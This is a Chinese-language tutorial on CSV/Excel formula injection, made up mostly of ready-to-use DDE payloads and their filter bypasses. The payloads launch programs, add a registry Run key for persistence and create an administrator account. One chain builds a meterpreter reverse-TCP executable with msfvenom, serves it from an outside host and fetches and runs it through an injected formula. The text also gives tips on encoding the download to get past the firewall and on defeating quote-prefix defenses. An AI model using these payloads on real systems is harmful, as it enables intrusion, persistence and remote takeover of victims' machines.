csv注入利用和绕过总结

csv注入

csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。

漏洞原理

漏洞原理就是excel的一个特性,当单元格中内容以=-+@等符号开头时,excel将会将其当成一个公式处理。

所以当我们输入=1+1时,excel会自动将其计算

那么利用这个办法,把等号后面的内容改为执行cmd命令控制其打开一个计算器

1
=1+cmd|' /C calc'!A0

漏洞利用

修改注册表

1
=cmd|'/C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v calc /t REG_SZ /d c:\windows\system32\calc.exe /f'!A0

添加用户

1
=cmd|'/C net user test 123456 /add'!A0+

可以使用命令注入中的知识,同时执行两个命令,达到新建一个管理员用户的效果

1
=cmd|'/C net user test 123456 /add && net localgroup administrators test /add'!A0

下载木马,反弹shell

准备木马

1
2
3
4
5
6
#msf生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o reverse_tcp.exe
#python2开启http服务
python -m SimpleHTTPServer 8888
#python3开启http服务
python -m http.server 8888

攻击机监听

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
set LPORT 4444
run

靶机从python http服务下载木马并执行

1
curl http://170.170.64.17:8888/reverse_tcp.exe --output windowsLocal.exe && .\windowsLocal.exe

那么我们在csv注入场景下的payload就是

1
=cmd|'/C curl http://170.170.64.17:8888/reverse_tcp.exe --output windowsLocal.exe && .\windowsLocal.exe'!A0

不过这个方法一般会在下载步骤被windows防火墙拦截,可以自行增加一层编解码或者加解密过程。

反弹shell也可以通过调用powershell下载powercat反弹,使用nc监听。

漏洞绕过

其他运算符号绕过

很多场景下服务器会过滤=,但是在excel中,+,-,@等也可以触发公式

1
2
3
-cmd|' /C calc'!A0
+cmd|' /C calc'!A0
@SUM(cmd|'/c calc'!A0)

%0A绕过自动添加单引号

有些防御手法会在等号之类的运算符前增加’,或每个元素开头直接添加单引号,可使用%0A换行执行

1
%0A-1+cmd|' /C calc'!A0

;绕过自动添加单引号

有些防御手法会在等号之类的运算符前增加’,或每个元素开头直接添加单引号,可使用;分割,分别执行

1
;-1+cmd|' /C calc'!A0